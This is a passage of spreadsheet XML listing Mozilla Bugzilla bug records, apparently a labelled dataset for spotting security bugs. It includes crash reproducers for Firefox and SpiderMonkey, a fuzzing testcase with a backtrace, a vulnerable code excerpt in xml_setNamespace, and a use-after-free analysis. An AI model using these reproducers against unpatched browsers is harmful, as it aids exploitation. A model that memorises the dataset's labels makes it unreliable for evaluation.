          <t>Core</t>
        </is>
      </c>
      <c r="J1397" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K1397" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1397" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1397" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1397" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1397" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1397" t="inlineStr">
        <is>
          <t>[advisory-tracking+][qa-]</t>
        </is>
      </c>
      <c r="Q1397" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1397" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1397" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T1397" t="n">
        <v>1</v>
      </c>
      <c r="U1397" t="n">
        <v>0</v>
      </c>
      <c r="V1397" t="n">
        <v>29</v>
      </c>
      <c r="W1397" t="inlineStr">
        <is>
          <t>STR:
 1. Visit about:config
 2. Set the pref webgl.msaa-level = 1
     (I didn't do this manually, at first -- this was already set in my profile for
      some reason. Not sure why.)
 3. Visit https://maps.google.com/?vector=1  (which should enable MapsGL)
ACTUAL RESULTS: Crash, with this printed to my terminal:
firefox: nvc0_surface.c:218: nvc0_resource_copy_region: Assertion `src-&gt;nr_samples == dst-&gt;nr_samples' failed.
Sample crash reports:
 bp-63b77e54-c5e4-45c6-b933-c26a32120730
 bp-5ec26eac-8033-4661-977d-b52222120730</t>
        </is>
      </c>
      <c r="X1397" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1398">
      <c r="A1398" t="n">
        <v>1667685</v>
      </c>
      <c r="B1398" t="inlineStr">
        <is>
          <t>2020-09-27 12:53:55 -0700</t>
        </is>
      </c>
      <c r="C1398" t="inlineStr">
        <is>
          <t>[warp] Assertion failure: !icScript_-&gt;hasInlinedChild(entry.pcOffset()), at jit/TrialInlining.cpp:358 with gc</t>
        </is>
      </c>
      <c r="D1398" t="inlineStr">
        <is>
          <t>2024-05-30 10:19:15 -0700</t>
        </is>
      </c>
      <c r="E1398" t="n">
        <v>1</v>
      </c>
      <c r="F1398" t="n">
        <v>1</v>
      </c>
      <c r="G1398" t="n">
        <v>3</v>
      </c>
      <c r="H1398" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1398" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1398" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1398" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1398" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1398" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1398" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1398" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1398" t="inlineStr">
        <is>
          <t>[sec-survey][post-critsmash-triage][adv-main83+]</t>
        </is>
      </c>
      <c r="Q1398" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1398" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1398" t="inlineStr">
        <is>
          <t>83 Branch</t>
        </is>
      </c>
      <c r="T1398" t="n">
        <v>1</v>
      </c>
      <c r="U1398" t="n">
        <v>0</v>
      </c>
      <c r="V1398" t="n">
        <v>8</v>
      </c>
      <c r="W1398" t="inlineStr">
        <is>
          <t>```js
Function.call.bind();
Function.call.bind();
Function.call.bind();
Function.call.bind();
Function.call.bind();
Function.call.bind();
Function.call.bind();
Function.call.bind();
gc();
oomTest(Function.call.bind);
```
```
(gdb) bt
#0  js::jit::TrialInliner::maybeInlineCall (this=0x7fffffffab70, entry=..., loc=...)
    at /home/skygentoo/trees/mozilla-central/js/src/jit/TrialInlining.cpp:358
#1  0x0000555557dc18ca in js::jit::TrialInliner::tryInlining (this=0x7fffffffab70) at /home/skygentoo/trees/mozilla-central/js/src/jit/TrialInlining.cpp:413
#2  0x0000555557dc15fb in js::jit::DoTrialInlining (cx=0x7ffff6927000, frame=0x7fffffffac40)
    at /home/skygentoo/trees/mozilla-central/js/src/jit/TrialInlining.cpp:62
#3  0x00003d28197eac35 in ?? ()
#4  0x0000000000002043 in ?? ()
#5  0x00007fffffffac00 in ?? ()
#6  0x0000555558d3da10 in js::jit::vmFunctions ()
#7  0x00003d2819860b11 in ?? ()
#8  0x0000000000007821 in ?? ()
#9  0x00007fffffffac40 in ?? ()
#10 0xfff9800000000000 in ?? ()
#11 0xfff9800000000000 in ?? ()
#12 0xfff9800000000000 in ?? ()
#13 0xfff9800000000000 in ?? ()
#14 0x0000007aba99d0b0 in ?? ()
#15 0x00007ffff63fa0a3 in ?? ()
#16 0x0000000000000000 in ?? ()
(gdb)
```
```
The first bad revision is:
changeset:   https://hg.mozilla.org/mozilla-central/rev/cfb6ef22174c
user:        Jan de Mooij
date:        Wed Sep 16 11:15:38 2020 +0000
summary:     Bug 1664786 part 4 - Set initial warm-up threshold for trial-inlined scripts. r=iain
```
Run with `--fuzzing-safe --baseline-warmup-threshold=0 --ion-warmup-threshold=0 --cpu-count=2 --fast-warmup --warp`, compile with `AR=ar sh ./configure --enable-debug --enable-more-deterministic --with-ccache --enable-gczeal --enable-debug-symbols --disable-tests`, tested on m-c rev cb8232ebe212.
I doubt this is s-s since oomTest is here, but gc is involved, so I'll let Jan/other devs make the decision.</t>
        </is>
      </c>
      <c r="X1398" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1399">
      <c r="A1399" t="n">
        <v>580206</v>
      </c>
      <c r="B1399" t="inlineStr">
        <is>
          <t>2010-07-20 03:32:11 -0700</t>
        </is>
      </c>
      <c r="C1399" t="inlineStr">
        <is>
          <t>Release Bugzilla 3.2.8, 3.4.8, 3.6.2, and 3.7.3</t>
        </is>
      </c>
      <c r="D1399" t="inlineStr">
        <is>
          <t>2010-08-12 09:04:13 -0700</t>
        </is>
      </c>
      <c r="E1399" t="n">
        <v>1</v>
      </c>
      <c r="F1399" t="n">
        <v>1</v>
      </c>
      <c r="G1399" t="n">
        <v>4</v>
      </c>
      <c r="H1399" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1399" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1399" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K1399" t="inlineStr">
        <is>
          <t>3.7.2</t>
        </is>
      </c>
      <c r="L1399" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1399" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1399" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1399" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1399" t="inlineStr"/>
      <c r="Q1399" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1399" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1399" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1399" t="n">
        <v>1</v>
      </c>
      <c r="U1399" t="n">
        <v>0</v>
      </c>
      <c r="V1399" t="n">
        <v>10</v>
      </c>
      <c r="W1399" t="inlineStr">
        <is>
          <t>We have a bunch of releases to do. There are several security issues fixed that should be released.</t>
        </is>
      </c>
      <c r="X1399" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1400">
      <c r="A1400" t="n">
        <v>597121</v>
      </c>
      <c r="B1400" t="inlineStr">
        <is>
          <t>2010-09-16 11:49:29 -0700</t>
        </is>
      </c>
      <c r="C1400" t="inlineStr">
        <is>
          <t>several reports returning 500 on prod</t>
        </is>
      </c>
      <c r="D1400" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E1400" t="n">
        <v>1</v>
      </c>
      <c r="F1400" t="n">
        <v>1</v>
      </c>
      <c r="G1400" t="n">
        <v>4</v>
      </c>
      <c r="H1400" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1400" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1400" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1400" t="inlineStr">
        <is>
          <t>1.7</t>
        </is>
      </c>
      <c r="L1400" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1400" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1400" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1400" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1400" t="inlineStr"/>
      <c r="Q1400" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1400" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1400" t="inlineStr">
        <is>
          <t>1.8</t>
        </is>
      </c>
      <c r="T1400" t="n">
        <v>1</v>
      </c>
      <c r="U1400" t="n">
        <v>0</v>
      </c>
      <c r="V1400" t="n">
        <v>17</v>
      </c>
      <c r="W1400" t="inlineStr">
        <is>
          <t>Created attachment 475933
http header
1. several Camino crash reports on prod are returning 500.
some of the urls' are:
http://crash-stats.mozilla.com/report/index/30aad274-8d2c-4478-9f53-b56c42100916
2. All Fennec reports return 500 as well:
   http://crash-stats.mozilla.com/report/index/7e59f7b1-f4ac-434e-898b-79a472100916</t>
        </is>
      </c>
      <c r="X1400" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1401">
      <c r="A1401" t="n">
        <v>599166</v>
      </c>
      <c r="B1401" t="inlineStr">
        <is>
          <t>2010-09-23 16:21:14 -0700</t>
        </is>
      </c>
      <c r="C1401" t="inlineStr">
        <is>
          <t>potential overflow in xml_setNamespace</t>
        </is>
      </c>
      <c r="D1401" t="inlineStr">
        <is>
          <t>2014-10-12 13:58:51 -0700</t>
        </is>
      </c>
      <c r="E1401" t="n">
        <v>1</v>
      </c>
      <c r="F1401" t="n">
        <v>1</v>
      </c>
      <c r="G1401" t="n">
        <v>3</v>
      </c>
      <c r="H1401" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1401" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1401" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1401" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1401" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1401" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1401" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1401" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1401" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q1401" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1401" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1401" t="inlineStr">
        <is>
          <t>mozilla2.0b7</t>
        </is>
      </c>
      <c r="T1401" t="n">
        <v>1</v>
      </c>
      <c r="U1401" t="n">
        <v>0</v>
      </c>
      <c r="V1401" t="n">
        <v>22</v>
      </c>
      <c r="W1401" t="inlineStr">
        <is>
          <t>Fast native xml_setNamespace can write to vp[2] when argc == 0
Here is the relevant code:
static JSBool
xml_setNamespace(JSContext *cx, uintN argc, jsval *vp)
{
    JSObject *qn;
    JSObject *ns;
    jsval qnargv[2];
    JSXML *nsowner;
    NON_LIST_XML_METHOD_PROLOG;
    if (!JSXML_HAS_NAME(xml))
        return JS_TRUE;
    xml = CHECK_COPY_ON_WRITE(cx, xml, obj);
    if (!xml)
        return JS_FALSE;
    ns = js_ConstructObject(cx, &amp;js_NamespaceClass, NULL, obj,
                            argc == 0 ? 0 : 1, Valueify(vp + 2));
    if (!ns)
        return JS_FALSE;
    vp[0] = OBJECT_TO_JSVAL(ns);
    ns-&gt;setNamespaceDeclared(JSVAL_TRUE);
    qnargv[0] = vp[2] = OBJECT_TO_JSVAL(ns);
    qnargv[1] = OBJECT_TO_JSVAL(xml-&gt;name);</t>
        </is>
      </c>
      <c r="X1401" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1402">
      <c r="A1402" t="n">
        <v>1244250</v>
      </c>
      <c r="B1402" t="inlineStr">
        <is>
          <t>2016-01-29 12:08:51 -0800</t>
        </is>
      </c>
      <c r="C1402" t="inlineStr">
        <is>
          <t>Make sure the AnimationManager/TransitionManager objects stay alive for the duration their DispatchEvents() calls</t>
        </is>
      </c>
      <c r="D1402" t="inlineStr">
        <is>
          <t>2016-09-22 14:48:07 -0700</t>
        </is>
      </c>
      <c r="E1402" t="n">
        <v>1</v>
      </c>
      <c r="F1402" t="n">
        <v>1</v>
      </c>
      <c r="G1402" t="n">
        <v>3</v>
      </c>
      <c r="H1402" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1402" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1402" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K1402" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1402" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1402" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1402" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1402" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1402" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1402" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1402" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1402" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T1402" t="n">
        <v>1</v>
      </c>
      <c r="U1402" t="n">
        <v>0</v>
      </c>
      <c r="V1402" t="n">
        <v>26</v>
      </c>
      <c r="W1402" t="inlineStr">
        <is>
          <t>I have some concerns about the code that we fixed in bug 1211334, and the way we fixed it.
In particular:
 - Bug 1211334 comment 1 suggests that we were crashing due to calling context-&gt;AnimationManager()-&gt;DispatchEvents(), with a null AnimationManager() pointer.
 - As noted in that comment, this suggests that the context-&gt;AnimationManager() was changing to null *while we were running the TransitionManager's DispatchEvents() call*.
 - This would happen via a call to nsPresContext::SetShell(nullptr), which nsPresShell calls in its Destroy method. So we're hitting this code:
&gt; 1187     if (mTransitionManager) {
&gt; 1188       mTransitionManager-&gt;Disconnect();
&gt; 1189       mTransitionManager = nullptr;
&gt; 1190     }
&gt; 1191     if (mAnimationManager) {
&gt; 1192       mAnimationManager-&gt;Disconnect();
&gt; 1193       mAnimationManager = nullptr;
&gt; 1194     }
These manager pointers are RefPtr&lt;&gt;s, so when we clear them here, we might be destroying these objects.  This happens *while we're inside of a call to a TransitionManager method* (DispatchEvents).  These MXR searches suggest to me that there are no other owning references to these objects (though I'm not 100% sure), which means these nulling-out operations probably delete these objects:
http://mxr.mozilla.org/mozilla-central/search?string=RefPtr.*AnimationManager&amp;regexp=1
http://mxr.mozilla.org/mozilla-central/search?string=RefPtr.*TransitionManager&amp;regexp=1
So, it looks to me like we could end up deleting the TransitionManager partway through its DispatchEvents method, which suggests that DispatchEvents could end up using deleted data for the remainder of its run.
(This same problem could also happen during TransitionManager::DispatchEvents.)</t>
        </is>
      </c>
      <c r="X1402" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1403">
      <c r="A1403" t="n">
        <v>784521</v>
      </c>
      <c r="B1403" t="inlineStr">
        <is>
          <t>2012-08-21 15:05:15 -0700</t>
        </is>
      </c>
      <c r="C1403" t="inlineStr">
        <is>
          <t>Allow 10.130.0.0/16 talking to aus3-staging.mozilla.org:22</t>
        </is>
      </c>
      <c r="D1403" t="inlineStr">
        <is>
          <t>2022-11-01 13:17:06 -0700</t>
        </is>
      </c>
      <c r="E1403" t="n">
        <v>1</v>
      </c>
      <c r="F1403" t="n">
        <v>1</v>
      </c>
      <c r="G1403" t="n">
        <v>6</v>
      </c>
      <c r="H1403" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1403" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations Graveyard</t>
        </is>
      </c>
      <c r="J1403" t="inlineStr">
        <is>
          <t>NetOps: DC ACL Request</t>
        </is>
      </c>
      <c r="K1403" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1403" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1403" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1403" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1403" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1403" t="inlineStr"/>
      <c r="Q1403" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1403" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1403" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1403" t="n">
        <v>1</v>
      </c>
      <c r="U1403" t="n">
        <v>0</v>
      </c>
      <c r="V1403" t="n">
        <v>10</v>
      </c>
      <c r="W1403" t="inlineStr">
        <is>
          <t>We need to upload update snippets from ec2 slaves (10.130.0.0/16) to aus3-staging.mozilla.org using scp.
$ host aus3-staging.mozilla.org 
aus3-staging.mozilla.org is an alias for dp-ausstage01.phx.mozilla.com.
dp-ausstage01.phx.mozilla.com has address 10.8.74.30
Could you add add 10.130.0.0/16 to netflows, pleasw?</t>
        </is>
      </c>
      <c r="X1403" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1404">
      <c r="A1404" t="n">
        <v>69525</v>
      </c>
      <c r="B1404" t="inlineStr">
        <is>
          <t>2001-02-20 11:40:25 -0800</t>
        </is>
      </c>
      <c r="C1404" t="inlineStr">
        <is>
          <t>Attachments added via dnd aren't sent</t>
        </is>
      </c>
      <c r="D1404" t="inlineStr">
        <is>
          <t>2008-07-31 01:22:10 -0700</t>
        </is>
      </c>
      <c r="E1404" t="n">
        <v>1</v>
      </c>
      <c r="F1404" t="n">
        <v>1</v>
      </c>
      <c r="G1404" t="n">
        <v>3</v>
      </c>
      <c r="H1404" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1404" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J1404" t="inlineStr">
        <is>
          <t>Composition</t>
        </is>
      </c>
      <c r="K1404" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1404" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M1404" t="inlineStr">
        <is>
          <t>Mac System 9.x</t>
        </is>
      </c>
      <c r="N1404" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1404" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1404" t="inlineStr">
        <is>
          <t>[nsbeta1+]</t>
        </is>
      </c>
      <c r="Q1404" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1404" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1404" t="inlineStr">
        <is>
          <t>mozilla0.9</t>
        </is>
      </c>
      <c r="T1404" t="n">
        <v>1</v>
      </c>
      <c r="U1404" t="n">
        <v>0</v>
      </c>
      <c r="V1404" t="n">
        <v>6</v>
      </c>
      <c r="W1404" t="inlineStr">
        <is>
          <t>- open mail compose
- drag a text file from the finder into the window. you'll see it show up
- hit send
- get your mail (on another machine, using 4.x)
No attachment. If you add it manually (via file picker dialog), it works.</t>
        </is>
      </c>
      <c r="X1404" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1405">
      <c r="A1405" t="n">
        <v>445704</v>
      </c>
      <c r="B1405" t="inlineStr">
        <is>
          <t>2008-07-17 03:05:13 -0700</t>
        </is>
      </c>
      <c r="C1405" t="inlineStr">
        <is>
          <t>JSON bookmarks backup has localized filename (and can't be easily restored)</t>
        </is>
      </c>
      <c r="D1405" t="inlineStr">
        <is>
          <t>2009-11-26 06:24:28 -0800</t>
        </is>
      </c>
      <c r="E1405" t="n">
        <v>1</v>
      </c>
      <c r="F1405" t="n">
        <v>1</v>
      </c>
      <c r="G1405" t="n">
        <v>2</v>
      </c>
      <c r="H1405" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1405" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1405" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K1405" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1405" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1405" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1405" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1405" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1405" t="inlineStr">
        <is>
          <t>[has patch][has review]</t>
        </is>
      </c>
      <c r="Q1405" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1405" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1405" t="inlineStr">
        <is>
          <t>Firefox 3.1b2</t>
        </is>
      </c>
      <c r="T1405" t="n">
        <v>1</v>
      </c>
      <c r="U1405" t="n">
        <v>0</v>
      </c>
      <c r="V1405" t="n">
        <v>31</v>
      </c>
      <c r="W1405" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9) Gecko/2008052906 Firefox/3.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9) Gecko/2008052906 Firefox/3.0
Hi,
Using the Dutch localisation, when I look in the bookmarkbackups folder of my profile I see the following files:
bladwijzers-2008-07-16.json
bookmarks-2008-03-13.html
The .html version is a left-over from before the JSON bookmark backups were put into effect. However, this made me notice that the file name changed along with the file format.
It seems that for the JSON version of the bookmarks backup, the localized name is used? (But not a localised date!) That looks like a bug to me. The filename should not contain any locale-specific parts. There is no precedent for that in the rest of the Firefox profile’s filenames, and no good reason to either.
The file name of the JSON file should be the same as the HTML one was. Having a localised part in the filename can lead to unexpected bugs (e.g. does the part that restores a bookmarks backup also use the localised name?).
~Grauw
Reproducible: Always
Steps to Reproduce:
1. Install and use a non-English version of Firefox
2. Go to C:\Users\…\AppData\Roaming\Mozilla\Firefox\Profiles\…\bookmarkbackups
3. Observe how the JSON bookmark backups contain a localised name, e.g. bladwijzers-2008-07-16.json</t>
        </is>
      </c>
      <c r="X1405" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1406">
      <c r="A1406" t="n">
        <v>1284799</v>
      </c>
      <c r="B1406" t="inlineStr">
        <is>
          <t>2016-07-06 01:51:05 -0700</t>
        </is>
      </c>
      <c r="C1406" t="inlineStr">
        <is>
          <t>Backlog of detect_intermittents and generate_perf_alerts tasks on SCL3 prod</t>
        </is>
      </c>
      <c r="D1406" t="inlineStr">
        <is>
          <t>2016-07-06 02:42:57 -0700</t>
        </is>
      </c>
      <c r="E1406" t="n">
        <v>1</v>
      </c>
      <c r="F1406" t="n">
        <v>1</v>
      </c>
      <c r="G1406" t="n">
        <v>7</v>
      </c>
      <c r="H1406" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1406" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1406" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K1406" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1406" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1406" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1406" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1406" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1406" t="inlineStr"/>
      <c r="Q1406" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1406" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1406" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1406" t="n">
        <v>1</v>
      </c>
      <c r="U1406" t="n">
        <v>0</v>
      </c>
      <c r="V1406" t="n">
        <v>2</v>
      </c>
      <c r="W1406" t="inlineStr">
        <is>
          <t>There is currently an increasing backlog of detect_intermittents and generate_perf_alerts tasks on SCl3 prod. (5000+ of the former, and 2000+ of the latter).
These tasks are run from the `bin/run_celery_worker` script:
https://github.com/mozilla/treeherder/blob/b040bb40455e2baac403813c882d143711262b49/bin/run_celery_worker#L18
Which is run on the treeherder-rabbitmq2.private.scl3.mozilla.com node.
However this node also runs:
bin/run_celerybeat
bin/run_celery_worker_hp
So between the above, the following queues are served by this single node:
default
cycle_data
calculate_durations
fetch_bugs
fetch_allthethings
generate_perf_alerts
detect_intermittents
classification_mirroring
publish_to_pulse</t>
        </is>
      </c>
      <c r="X1406" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1407">
      <c r="A1407" t="n">
        <v>1221872</v>
      </c>
      <c r="B1407" t="inlineStr">
        <is>
          <t>2015-11-04 21:25:56 -0800</t>
        </is>
      </c>
      <c r="C1407" t="inlineStr">
        <is>
          <t>crash in js::jit::LRecoverInfo::appendResumePoint</t>
        </is>
      </c>
      <c r="D1407" t="inlineStr">
        <is>
          <t>2016-09-22 17:19:06 -0700</t>
        </is>
      </c>
      <c r="E1407" t="n">
        <v>1</v>
      </c>
      <c r="F1407" t="n">
        <v>1</v>
      </c>
      <c r="G1407" t="n">
        <v>3</v>
      </c>
      <c r="H1407" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1407" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1407" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K1407" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1407" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1407" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N1407" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1407" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1407" t="inlineStr">
        <is>
          <t>[after:2016-06-01;ni?:nbp][adv-main46-][adv-esr38.7+][adv-esr45.1-]</t>
        </is>
      </c>
      <c r="Q1407" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1407" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1407" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T1407" t="n">
        <v>1</v>
      </c>
      <c r="U1407" t="n">
        <v>0</v>
      </c>
      <c r="V1407" t="n">
        <v>83</v>
      </c>
      <c r="W1407" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-721e86d9-1968-43db-855c-106452151105.
=============================================================
1. http://www.digitalforsyth.org/photos/browse/people-individuals-baise-betty
2. Crash [@ js::jit::LRecoverInfo::appendResumePoint ]
Appears to be Windows, Linux and OSX, Beta/43, Aurora/44, Nighty/45. Automation only reproduced on debug though I found the same waiting for the page to complete loading with an opt build.
Reproduced in Bughunter and manually on Windows 7.
opt-asan builds on Linux have stacks like: InlineSpaghettiStackIterator begin storesBegin js::jit::LRecoverInfo::appendResumePoint(js::jit::MResumePoint*) init</t>
        </is>
      </c>
      <c r="X1407" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1408">
      <c r="A1408" t="n">
        <v>860315</v>
      </c>
      <c r="B1408" t="inlineStr">
        <is>
          <t>2013-04-10 08:39:16 -0700</t>
        </is>
      </c>
      <c r="C1408" t="inlineStr">
        <is>
          <t>[mozqa.com] Configure 6 public IP VIPs on SCL3 Zeus</t>
        </is>
      </c>
      <c r="D1408" t="inlineStr">
        <is>
          <t>2019-03-06 09:54:02 -0800</t>
        </is>
      </c>
      <c r="E1408" t="n">
        <v>1</v>
      </c>
      <c r="F1408" t="n">
        <v>1</v>
      </c>
      <c r="G1408" t="n">
        <v>6</v>
      </c>
      <c r="H1408" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1408" t="inlineStr">
        <is>
